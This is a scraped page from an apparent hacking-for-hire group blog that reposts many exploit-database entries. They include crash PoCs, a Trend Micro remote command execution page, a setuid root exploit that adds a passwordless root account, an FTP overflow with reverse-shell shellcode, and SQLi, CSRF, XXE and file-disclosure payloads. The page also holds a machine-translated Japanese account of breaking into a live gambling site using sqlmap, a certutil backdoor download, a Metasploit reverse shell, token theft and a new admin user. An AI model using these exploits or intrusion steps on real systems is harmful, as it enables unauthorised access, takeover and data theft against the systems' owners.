Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863595016

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title     : SNScan v1.05 Scan Hostname/IP Field Buffer Overflow Crash PoC
# Discovery by      : Daniel Velazquez
# Email         : ingenierovelazquez@hotmail.com
# Discovery Date    : 12/01/2016
# Vendor Homepage   : http://www.foundstone.com
# Software Link     : http://www.mcafee.com/us/downloads/free-tools/snscan.aspx
# Tested Version    : 1.05
# Vulnerability Type    : Denial of Service (DoS) Local
# Tested on OS      : Windows 8 x86 es
# Steps to Produce the Crash: 
# 1.- Run python code : python SNScan-v1.05.py
# 2.- Open SNScan-v1.05.txt and copy content to clipboard
# 3.- Open SNScan.exe
# 4.- Clic button Ok
# 5.- Paste Clipboard Scan > Hostname/IP
# 6.- Clic on add button (->)
# 7.- Clic button Aceptar
# 8.- Crashed
 
buffer = "\x41" * 388
eip = "\x42" * 4
 
f = open ("SNScan-v1.05.txt", "w")
f.write(buffer + eip)
f.close()
HireHackking 
#[+] Title:  Apple watchOS - Remote Crash Exploit
#[+] Product: Apple
#[+] Vendor: www.apple.com
#[+] SoftWare Link : www.apple.com/watchos-2/
#[+] Vulnerable Version(s): watchOS on IOS 9.0.1
#
#
# Author      :   Mohammad Reza Espargham
# Linkedin    :   https://ir.linkedin.com/in/rezasp
# E-Mail      :   me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website     :   www.reza.es
# Twitter     :   https://twitter.com/rezesp
# FaceBook    :   https://www.facebook.com/reza.espargham


#  1. open your phone Clock / goto Alarm
# 2. add alarm / set time [for example two minutes later]
# 3. click label /  input 5000 x “0"
# 4. Save
# 5. Lock Your phone and wait for alarm
# 6. When the alarm clock rings / Watch Crashed ;)
HireHackking 
source: https://www.securityfocus.com/bid/68117/info

Foreman is prone to a remote command-injection vulnerability.

Successful exploits will result in the execution of arbitrary commands with the privileges of the user running foreman-proxy. 

curl -3 -H "Accept:application/json" -k -X POST -d "dummy=exploit" 'https://www.example.com:8443/tftp/fetch_boot_file?prefix=a&path=%3Btouch%20%2Ftmp%2Fbusted%3B'
HireHackking 
source: https://www.securityfocus.com/bid/68182/info

ZeusCart is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

ZeusCart 4.0 is vulnerable; other versions may also be affected. 

http://www.example.com/index.php?do=addtocart&prodid=${PROD_ID} and sleep(1)
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=629

The attached file causes a use-after-free when calling the stage setter. The PoC works most consistently in Firefox for 64-bit Windows.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39221.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=628

There is a use-after-free that appears to be related to rendering the display based on multiple scripts. A PoC is attached, tested on Windows only. Note the PoC is somewhat unreliable on some browsers, sometimes it needs to render a minute or two in the foreground before crashing. This is related to unreliability in the freed object being reallocated as a value that causes the crash, not unreliability in the underlying bug (it crashes immediately in a debug build of Flash). With enough effort, an attacker could likely trigger the issue immediately.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39220.zip
HireHackking 
<!--
Source: https://code.google.com/p/google-security-research/issues/detail?id=693

When you install TrendMicro Antivirus on Windows, by default a component called Password Manager is also installed and automatically launched on startup.

http://www.trendmicro.com/us/home/products/software/password-manager/index.html

This product is primarily written in JavaScript with node.js, and opens multiple HTTP RPC ports for handling API requests.

It took about 30 seconds to spot one that permits arbitrary command execution, openUrlInDefaultBrowser, which eventually maps to ShellExecute().

This means any website can launch arbitrary commands, like this:

x = new XMLHttpRequest()
x.open("GET", "https://localhost:49155/api/openUrlInDefaultBrowser?url=c:/windows/system32/calc.exe true);
try { x.send(); } catch (e) {};

(Note that you cannot read the response due to the same origin policy, but it doesn't matter - the command is still executed).
-->

<html>
<head>
    <title>Trend Micro Maximum Security 10 Exploit</title>
</head>
<body>
    <p>
    Sample exploit for Trend Micro Maximum Security 10.
    <p>
    -- Tavis Ormandy.
    <p>
    Command: <input id="command" value="C:/PROGRA~1/TRENDM~1/Titanium/Remove.exe" size="64">
    <p>
    <a href="javascript:begin()">Click Here</a> to run the command above (the default will uninstall Trend Micro Maximum).
    <p>
    <img src="http://reactiongifs.us/wp-content/uploads/2013/02/awesome_to_the_max.gif">
<script>
    function begin() {
        // The command you want to run, arguments will work but don't use single quotes.
        // Lets uninstall Trend Micro.
        var cmd  = document.getElementById('command').value;

        // Start port, Trend Micro trys top open a port starting here until it works.
        var port = 49155;

        // Wrapper code to start cmd.
        var code = "topWindow.require('child_process').spawn('cmd', [ '/c', '" + cmd + "' ])"

        // We can't send quotes, so encode that via character codes.
        code = code.split('').map(function(a){ return a.charCodeAt(0) }).join(',');

        // Create the XHR's
        for (; port <= 49160; port++) {
            var x = new XMLHttpRequest();

            x.open('GET', 'https://localhost:' + port + '/api/showSB?url=javascript:eval(String.fromCharCode(' + code + '))', false);

            // We can't tell if it worked because of the cross domain policy.
            try { x.send(); } catch (e) {};
        }
    }
</script>
HireHackking 
/*
AMANDA, the Advanced Maryland Automatic Network Disk Archiver, is a backup 
solution that allows the IT administrator to set up a single master backup
server to back up multiple hosts over network to tape drives/changers or 
disks or optical media. Amanda uses native utilities and formats (e.g. dump
and/or GNU tar) and can back up a large number of servers and workstations
running multiple versions of Linux or Unix. 

A user with backup privs can trivially compromise a client installation.
The "runtar" setuid root binary does not check for additional arguments
supplied after --create, allowing users to manipulate commands and perform
command injection as root. Tested against Amanda 3.3.1.

An example is shown below:

$ uname -a
Linux raspberrypi 3.10.25 #1 Sat Dec 28 20:50:23 EST 2013 armv6l GNU/Linux
$ ls -al /usr/lib/amanda/runtar
-rwsr-xr-- 1 root backup 9776 Jul 29  2012 /usr/lib/amanda/runtar
$ id
uid=34(backup) gid=34(backup) groups=34(backup),6(disk),26(tape)
$ cat /tmp/x.c
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main(){
        setreuid(0,0);
        setregid(0,0);
        system("echo r00t::0:0::/:/bin/sh >> /etc/passwd");
        exit(0);
}

/*
$ su - r00t
No passwd entry for user 'r00t'
$ gcc x.c -o x
$ /usr/lib/amanda/runtar NOCONFIG tar --create --rsh-command=/tmp/x -vf localhost:/tmp/lol /etc/passwd
tar: localhost\:/tmp/lol: Cannot open: Input/output error
tar: Error is not recoverable: exiting now
$ su - r00t
# id
uid=0(root) gid=0(root) groups=0(root)

 -- Hacker Fantastic
*/
HireHackking 
# Title : KeePass Password Safe Classic 1.29 - Crash Proof Of Concept
# Affected Versions: All Version
# Founder : keepass.info
# Tested on Windows 7 / Server 2008
# Download Link : http://sourceforge.net/projects/keepass/files/KeePass%201.x/1.30/KeePass-1.30.zip
#
#
# Author      :   Mohammad Reza Espargham
# Linkedin    :   https://ir.linkedin.com/in/rezasp
# E-Mail      :   me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website     :   www.reza.es
# Twitter     :   https://twitter.com/rezesp
# FaceBook    :   https://www.facebook.com/reza.espargham
#
#
# 1 . run python code : python crash.py
# 2 . open “KeePass”
# 3 . File —> New (Create New Password Database)
# 4 . File —> Import —> CSV File…
# 5 . open r3z4.csv
# 6 . Right Click on “R3Z4” username and edit
# 7 . Crashed ;)



#!/usr/bin/env python
hdr = '"' #start syntax
hcr = "R3Z4" #user
oth = ',"' #user
oth2 = '","",""' #user
val=','
crash = "\x41"*199289 #B0F
exp = hdr+hcr+hdr+val+hdr+hcr+hdr+oth+crash+oth2
file = open("r3z4.csv", "w")
file.write(exp)
file.close()
HireHackking 
# Title: Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow.
# Date : 01/08/2016
# Author: TOMIWA.
# Software link: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip
# Software: Konica Minolta FTP Utility v1.0
# Tested: Windows 7 SP1 64bits
# Listen for a reverse netcat connection on port 4444
# root@kali:~# nc -nlvp 4444
# listening on [any] 4444 ...
# connect to [192.168.0.11] from (UNKNOWN) [192.168.0.109] 49158
# Microsoft Windows [Version 6.1.7601]
# Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

# C:\Program Files (x86)\KONICA MINOLTA\FTP Utility>


#!/usr/bin/python
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2B"
#msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=192.168.0.118 LPORT=4444 -e x86/shikata_ga_nai -b "\x00\x0d\x0a\x3d\x5c\x2f" -i 3 -f python
buf =  ""
buf += "\xbe\x95\x8c\xbb\x24\xdb\xdb\xd9\x74\x24\xf4\x5a\x29"
buf += "\xc9\xb1\x5f\x31\x72\x14\x83\xc2\x04\x03\x72\x10\x77"
buf += "\x79\x62\xe1\xae\xf6\xb1\x1e\xed\x1e\xe6\x8d\x3f\xba"
buf += "\x32\xfb\x8e\x64\x74\x90\xea\x97\x1d\x7c\x89\x73\x1d"
buf += "\x62\x91\x66\xa8\x21\x9a\xb7\xf6\xc8\xce\xd3\x8e\x8f"
buf += "\x12\xa5\xc1\x62\x44\xeb\x33\x84\x55\x7e\xa1\xae\xc1"
buf += "\x73\x50\xb4\xc6\xeb\x8a\x28\x66\x13\x8b\x8b\x42\x6d"
buf += "\x5b\xa6\x63\x02\xbe\x7b\x71\xf0\xcd\x6e\x36\x8c\x69"
buf += "\x3a\x7b\xc8\x03\xc7\xcf\xbe\x12\x0e\xf3\x7a\x29\xa7"
buf += "\xe3\xb3\x54\xd3\x12\xd7\x99\x2c\x7e\x63\x6d\x08\x79"
buf += "\x20\x29\x59\xf2\xfe\xe0\x1f\x9e\x6b\xa6\x36\x5a\x75"
buf += "\x15\xd8\x5d\x8b\x65\xdb\xad\x7c\x84\xe8\x17\xac\x07"
buf += "\xef\x45\x18\x29\x06\xbe\x07\x65\x68\xd5\xf9\xcb\x15"
buf += "\x56\x13\x25\xa3\x72\xd0\xd7\x57\x77\xbb\x8f\x4d\x17"
buf += "\xaf\xf9\x77\x53\x17\xf5\xeb\xab\xe0\x11\x1f\x88\xea"
buf += "\xab\xa9\xce\x0b\x8d\x84\x8f\x76\x05\x05\xdc\x04\x0c"
buf += "\x16\xc9\x84\x06\x6f\x2d\x02\x61\x59\xcd\x36\x17\x88"
buf += "\xe9\x3a\x4f\x63\x9e\x61\x24\xbf\xdc\xd9\x53\x42\x1a"
buf += "\xdf\xb2\x6e\xfe\xec\x8c\xf5\x6d\xeb\x74\x89\x29\x11"
buf += "\x1f\x4d\x9c\xc4\x64\xb9\x8c\x54\xa3\x2c\x3f\xf4\x98"
buf += "\x42\x11\xe0\x06\x32\x57\x75\xac\xaa\xec\x10\xda\x6d"
buf += "\x20\x51\x57\xdd\x99\x1f\x35\x90\x23\xb6\xdb\x37\x17"
buf += "\x1f\x1b\xea\xd1\x37\xc0\x88\x74\x4e\x74\xcf\x63\xb0"
buf += "\x4f\xdc\x2c\x90\xe2\x08\xcd\x49\x40\x36\x1a\xfb\x18"
buf += "\x29\x2b\x6f\x2e\x3c\x57\x6a\x79\xa8\xac\x49\xbe\xe7"
buf += "\x2e\x48\xa0\xeb\x4f\x36\x3b\xa2\x40\xff\x9f\x21\xcd"
buf += "\x8e\xb3\xdf\x92\xed\x3f\x12\x81\x1a\xba\x02\x20\x8f"
buf += "\x1d\x5a\xef\xb1\xc3\xb0\x90\xed\x6a\x21\x5b\xc6\xb9"
buf += "\x24\x3f\xa0\x3f\xc8\x4f\x05\xa3\xcf\x06\xa4\x06\xd5"
buf += "\x8e\xd7\x3e\x11\xc4\x8c\x12\xa7\x3b\x75\x3f\xe8\xd3"
buf += "\xd7\x08\x39\x83\xfa\x80\x71\x3c\x6e\x29\x8d\x5e\xcc"
buf += "\xa1\xd4"
#nSEH = "\xEB\x13\x90\x90"
#SEH = "\x9D\x6D\x20\x12" >> 12206D9D
buffer = "\x41" * 1037 + "\xeb\x0a\x90\x90" + "\x9D\x6D\x20\x12" + "\x90" *30 +  buf +  "D"*1955 
#buffer = "\x41" * 1060
print "\sending evil buffer...."
s.connect(('192.168.0.109',21)) #HARDCODED IP ADDRESS.
data = s.recv(1024)
s.send('USER anonymous' + '\r\n')
data = s.recv(1024)
s.send('PASS anonymous' + '\r\n')
data = s.recv(1024)
s.send('CWD ' +buffer+'\r\n')
s.close
HireHackking 
/*
source: https://www.securityfocus.com/bid/68048/info

The Linux kernel is prone to a local information-disclosure vulnerability.

Local attackers can exploit this issue to cause a memory leak to obtain sensitive information that may lead to further attacks.

Linux kernel 2.6.38 through 3.15-rc2 are vulnerable. 
*/

/*
 * $File: media-enum-poc.c
 * $Description: CVE-2014-1739: Infoleak PoC in media_device_enum_entities() leaking 200 kstack bytes on x86_32.
 * $Author: Salva Peiró <speirofr@gmail.com> (c) Copyright 2014.
 * $URL: http://speirofr.appspot.com/files/media-enum-poc.c
 * $License: GPLv2.
 */

#include <stdio.h>
#include <fcntl.h>
#include <string.h>
#include <stdint.h>

#include <sys/ioctl.h>
#include <linux/media.h>
#define MEDIA_DEV "/dev/media0"

int main(int argc, char *argv[])
{
    struct media_entity_desc u_ent = {};
    char *file = MEDIA_DEV;
    int i, fd, ret;

    if (argc > 1)
        file = argv[1];
    fd = open(file, O_RDONLY);
    if (fd < 0){
        perror("open " MEDIA_DEV);
        return -1;
    }

    u_ent.id = 0 | MEDIA_ENT_ID_FLAG_NEXT;
    ret=ioctl(fd, MEDIA_IOC_ENUM_ENTITIES, &u_ent);
    if (ret < 0){
        perror("ioctl " MEDIA_DEV);
        return -1;
    }

    printf("[*] CVE-2014-1739: Infoleak PoC in media_device_enum_entities() leaking %d kstack bytes:", sizeof(u_ent.reserved) + sizeof(u_ent.raw));
    for (i = 0; i < 200/sizeof(uint32_t); i++) {
        uint32_t data = *(uint32_t*)((uint32_t*)&u_ent.reserved+i);
        if (i % 4 == 0)
            printf("\n    %08d: ", i);
        printf("0x%08x ", data);
    }
    printf("\n");

    return ret;
}

/*
 gcc -Wall -g -m32 media-enum-poc.c -o media-enum-poc # */
HireHackking 
source: https://www.securityfocus.com/bid/67955/info

Featured Comments plugin for WordPress is prone to a cross-site request-forgery vulnerability.

An attacker can exploit the cross-site request forgery issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks.

Featured Comments 1.2.1 is vulnerable; other versions may also be affected. 

<form action=\"http://localhost/wp-admin/admin-ajax.php?action=feature_comments\"; method=\"POST\">
  <input type=\"text\" name=\"do\" value=\"feature\">
  <input type=\"text\" name=\"comment_id\" value=\"9\">
  <input type=\"submit\">
</form>
HireHackking 
source: https://www.securityfocus.com/bid/67954/info

JW Player for Flash & HTML5 Video is a Plugin for WordPress is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.

JW Player for Flash & HTML5 Video 2.1.3 is vulnerable; other versions may also be affected. 

http://www.example.com/wp-admin/admin.php?page=jwp6_menu&player_id=1&action=delete
HireHackking 
source: https://www.securityfocus.com/bid/67934/info

The Infocus theme for WordPress is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.

Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks. 

<html>
<body>
<form action="http://www.site.com/wp-content/themes/infocus/lib/scripts/dl-skin.php" method="post">
Download:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>
<input type="submit">
</form>
</body>
</html>
HireHackking 
source: https://www.securityfocus.com/bid/67911/info

Seo Panel is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.

Remote attackers can use a specially crafted request with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application. Information obtained could aid in further attacks.

Seo Panel 3.4.0 is vulnerable; other versions may also be affected. 

http://www.example.com/seopanel/download.php?file=/etc/purple/prefs.xml
HireHackking 
source: https://www.securityfocus.com/bid/67747/info

Huawei E303 Router is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.

Huawei E303 Router running firmware versions CH2E303SM is vulnerable; other versions may also be affected. 

[Proof -of-concept HTTP POST request]:
POST /api/sms/send-sms HTTP/1.1
Host: hi.link
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.8,de-de;q=0.5,de;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://hi.link/
Connection: keep-alive
Content-Type: text/plain
Content-Length: 225

<?xml version="1.0" 
encoding="UTF-8"?><request><Index>-1</Index><Phones><Phone>4422</Phone></Phones><Sca></Sca><Content>
Sample Text</Content><Length>0</Length><Reserved>1</Reserved><Date>2013-12-03 
16:00:00</Date></request>
HireHackking 
// source: https://www.securityfocus.com/bid/67742/info

Microsoft Windows is prone to a local denial-of-service vulnerability.

A local attacker can exploit this issue to crash the affected computer, denying service to legitimate users. 

#ifndef WIN32_NO_STATUS
# define WIN32_NO_STATUS
#endif
#include <windows.h>
#include <assert.h>
#include <stdio.h>
#include <winerror.h>
#include <winternl.h>
#include <stddef.h>
#include <winnt.h>
#ifdef WIN32_NO_STATUS
# undef WIN32_NO_STATUS
#endif
#include <ntstatus.h>
 
#pragma comment(lib, "ntdll")
#pragma comment(lib, "user32")
#pragma comment(lib, "gdi32")
#pragma comment(lib, "advapi32")
 
// InitializeTouchInjection() Win8.1 Testcase
// -- Tavis Ormandy <taviso@google.com>, Feb 2014.
 
int main(int argc, char **argv)
{
POINTER_TOUCH_INFO Contact;
SID_AND_ATTRIBUTES SidToRestricted;
ULONG Size;
HANDLE Handle;
 
ZeroMemory(&Contact, sizeof Contact);
ZeroMemory(&SidToRestricted, sizeof SidToRestricted);
 
// I *think* TOUCH_MASK_CONTACTAREA is required (i.e. rcContact), the rest
// just need to be valid.
Contact.pointerInfo.pointerType = PT_TOUCH;
Contact.pointerInfo.pointerFlags = POINTER_FLAG_DOWN | POINTER_FLAG_INRANGE | POINTER_FLAG_INCONTACT;
Contact.pointerInfo.ptPixelLocation.x = 'AAAA';
Contact.pointerInfo.ptPixelLocation.y = 'AAAA';
Contact.rcContact.left = 'AAAA';
Contact.rcContact.right = 'AAAA';
Contact.rcContact.top = 'AAAA';
Contact.rcContact.bottom = 'AAAA';
Contact.touchFlags = TOUCH_FLAG_NONE;
Contact.touchMask = TOUCH_MASK_CONTACTAREA;
Size = SECURITY_MAX_SID_SIZE;
Handle = INVALID_HANDLE_VALUE;
SidToRestricted.Sid = _alloca(Size);
 
CreateWellKnownSid(WinNullSid, NULL, SidToRestricted.Sid, &Size);
 
// This just exhausts available pool (how that's accomplished is irrelevant).
for (Size = 1 << 26; Size; Size >>= 1) {
while (CreateRoundRectRgn(0, 0, 1, Size, 1, 1))
;
}
 
for (;;) {
// Initialize touch injection with very small number of contacts.
InitializeTouchInjection(1, TOUCH_FEEDBACK_DEFAULT);
 
// Now increase the number of contacts, which should (eventually) cause an allocation fail.
InitializeTouchInjection(MAX_TOUCH_COUNT, TOUCH_FEEDBACK_DEFAULT);
 
// I think this will just massage the pool, sequence found by fuzzing.
OpenProcessToken(GetCurrentProcess(), MAXIMUM_ALLOWED, &Handle);
CreateRestrictedToken(Handle, 0, 0, NULL, 0, NULL, 1, &SidToRestricted, &Handle);
 
// Write something to the touch injection allocation.
InjectTouchInput(1, &Contact);
}
 
return 0;
}
HireHackking 
source: https://www.securityfocus.com/bid/67727/info

dpkg is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input.

Exploiting these issues will allow local attackers to modify files outside the destination directory and possibly gain access to the system.

dpkg 1.3.0 is vulnerable; other versions may also be affected. 

,--- exploit.patch ---
Index: index/symlink/index-file
@@ -0,0 +1,1 @@
+Escaped
`---
HireHackking 
source: https://www.securityfocus.com/bid/67689/info

webEdition CMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input.

A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

webEdition CMS 6.3.3.0 through 6.3.8.0 svn6985 are vulnerable; other versions may also be affected. 

 http://www.example.com/webEdition/we_fs.php?what=4[SQL]
HireHackking 
source: https://www.securityfocus.com/bid/67676/info

Castor Library is prone to an information-disclosure vulnerability.

An attacker can exploit this issue to gain access to sensitive information that may lead to further attacks.

Caster Library 1.3.3-RC1 and earlier are vulnerable. 

===========================================================
Proof-of-Concept Code and Exploit
===========================================================
Now let’s look at how Castor handles unmarshalling calls to show how an
application could be vulnerable:

In this simple class, we create Person object:
..snip..

public class Person implements java.io.Serializable {

/** The name of the person */
   private String name = null;

   /** The Date of birth */
   private Date dob = null;

   /** Creates a Person with no name */
   public Person() {
      super();
   }

   /** Creates a Person with the given name */
   public Person(String name) { this.name = name; }

..snip..

Next, we generate a class that takes in external XML data to convert the
XML document to a Person Object using the unmarshalling function:

public static Person deserializePersonWithStatic(String xmlInput)
{
    StringReader xmlReader = new StringReader(xmlInput);

    Person aPerson = null;
     try
      {
          aPerson = (Person) Unmarshaller.unmarshal(Person.class,
xmlReader);
      }
          catch (Exception e)
      {
          System.out.println("Failed to unmarshal the xml");
          e.printStackTrace();
    }

          return aPerson;
}


If our application took in the XML data from a user controllable location
and passed it through this unmarshalling function, the end user could use
this functionality to view local resources on the application’s hosting
server.  For example, look at the following Servlet that takes in XML data
from the Request:

public class GeneratePerson extends HttpServlet {

     public void doPost(HttpServletRequest req, HttpServletResponse res)
                              throws ServletException, IOException
          {
               String evilPersonXML = req.getParameter(“person”);

          Person anotherPerson = deserializePersonWithStatic(evilPersonXML);

          if(anotherPerson == null)
          {
                  System.out.println("No Person Object set");
          }
          else
          {
                  System.out.println("XXE Person name: " +
anotherPerson.getName());
          }

What would happen if we passed the following string into the “person”
request parameter value?:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><!DOCTYPE doc [
<!ENTITY x3 SYSTEM "file:///etc/passwd"> ]
<person><name>&x3;</name></person>

The output would be the following:
XXE Person name: ##
# User Database
#
# Note that this file is consulted directly only when the system is running
# in single-user mode.  At other times this information is provided by
# Open Directory.
#
# See the opendirectoryd(8) man page for additional information about
# Open Directory.
##
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
..snip..

As you can see, the unmarshalling function allowed external entities to be
referenced and therefore the contents of the server’s /etc/passwd file was
set within the “name” variable of the deserialized Person object.
HireHackking 
#Product                : WP Symposium Pro Social Network plugin
#Exploit Author      : Rahul Pratap Singh
#Home page Link  : https://wordpress.org/plugins/wp-symposium-pro
#Version                : 15.12
#Website               : 0x62626262.wordpress.com
#Twitter                 : @0x62626262
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date                    : 8/Jan/2016

1) XSS Vulnerability:

Vulnerable Code:

file: wps_usermeta_shortcodes.php

"wpspro_country" parameter is not sanitized, that leads to persistent xss.

Video Demonstration:
https://www.youtube.com/watch?v=Xglc3rNZPXs

2) CSRF Vulnerability:

Description:

Edit profile page is vulnerable to CSRF, that allows to change password
which in turn leads to full account takeover.

Exploit:

<html>
  <body>
    <form action="http://localhost/wp422/wordpress/index.php/edit-profile/"
method="POST" enctype="multipart/form-data">
      <input type="hidden" name="wps&#95;usermeta&#95;change&#95;update"
value="yes" />
      <input type="hidden" name="wpspro&#95;display&#95;name" value="rahul"
/>
      <input type="hidden" name="wpspro&#95;firstname" value="hello1" />
      <input type="hidden" name="wpspro&#95;lastname" value="hello2" />
      <input type="hidden" name="wpspro&#95;email" value="&#13;" />
      <input type="hidden" name="wpsro&#95;home" value="hello4" />
      <input type="hidden" name="wpspro&#95;country" value="hello5" />
      <input type="hidden" name="wpspro&#95;password" value="asdf" />
      <input type="hidden" name="wpspro&#95;password2" value="asdf" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Video Demonstration:
https://www.youtube.com/watch?v=sN65HlCRe9c


Fix:

Update to version 16.1


Disclosure Timeline:

reported to vendor  : 6/1/2016
vendor response     : 6/1/2016
vendor acknowledged : 6/1/2016
vendor scheduled a patch: 7/1/2016
CVE Number : Not assigned yet
HireHackking

0x01情報を収集

主にSQLインジェクションを練習したいので、情報収集は比較的簡単です。

FOFAを介して関連するCMSを見つけてください。ここでは、チェスとカードのバックグラウンドログインにSQLインジェクションの脆弱性があることがわかりました。

1049983-20220106103848636-924492451.png

0x02脆弱性エクスプロイト

1.シャトルを使用してOS-Shellを取得します

1049983-20220106103850462-796781300.png

2。Pythonを使用して、シンプルなHTTPサーバーを構築し、MSFによって生成されたバックドアファイルをマウントします

python -m simplehttpserver

1049983-20220106103851323-1030757479.png

3。OS-Shellの下のリモートダウンロードバックドア実行プログラム

OS-Shellの下にディレクトリを作成します

MKDIR C: \テスト

OS-Shellの下のCertutilコマンドを介して、バックドアファイルをサーバーにリモートでダウンロードします

1049983-20220106103851746-367273951.jpg 1049983-20220106103852218-758504582.jpg4。 MSFリバウンドシェルを実行します

Exploit/Mulit/Handerを使用します

set lhostは、リバウンドシェルのIPを受信します

走る

1049983-20220106103852625-1098906251.jpg 1049983-20220106103853010-983725142.jpg

5。サーバーに正常に入力しました

この時点で、突風の許可しかないことがわかりました。

6.ターゲットサーバーの権限を上げます

電力を高める方法:カーネルのエスカレーションと盗む管理トークンのエスカレーション

この記事では、盗難管理トークンのみを使用して電力を高めます

使用を使用して、セッショントークンモジュールをロードします

次に、list_tokens -uを使用してセッショントークンをリストします

1049983-20220106103853526-792774397.png

7.ユーザーを作成します

コマンド:ネットユーザー名パスワード /追加

1049983-20220106103854204-918244820.png

1049983-20220106103854793-904428810.png

0x03浸透概要

1。SQLMAPからOS-Shell2を取得します。 MSF 3の下でのバックドアファイルの生産。Python-M SimpleHttpserverを介してHTTPサーバーを構築し、生成されたバックドアファイルをHTTPサーバーディレクトリにコピーします。 2. OS-Shellモードでディレクトリを作成し、certutilを介してHTTPサーバーのバックドアをリモートダウンロードします。 4。MSFを介してシェルをバウンスします。 MSFの下にユーザーを追加し、管理者グループに追加すると、デスクトップでリモートでログインできます

HireHackking 
source: https://www.securityfocus.com/bid/67656/info

PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

PHP-Nuke 8.3 is vulnerable; other versions may also be affected. 

http://www.example.com/modules.php?name=Submit_News&subject=whatever&topics[]=[SQLi]
HireHackking 
source: https://www.securityfocus.com/bid/67610/info

Pyplate is prone to a cross-site request-forgery vulnerability.

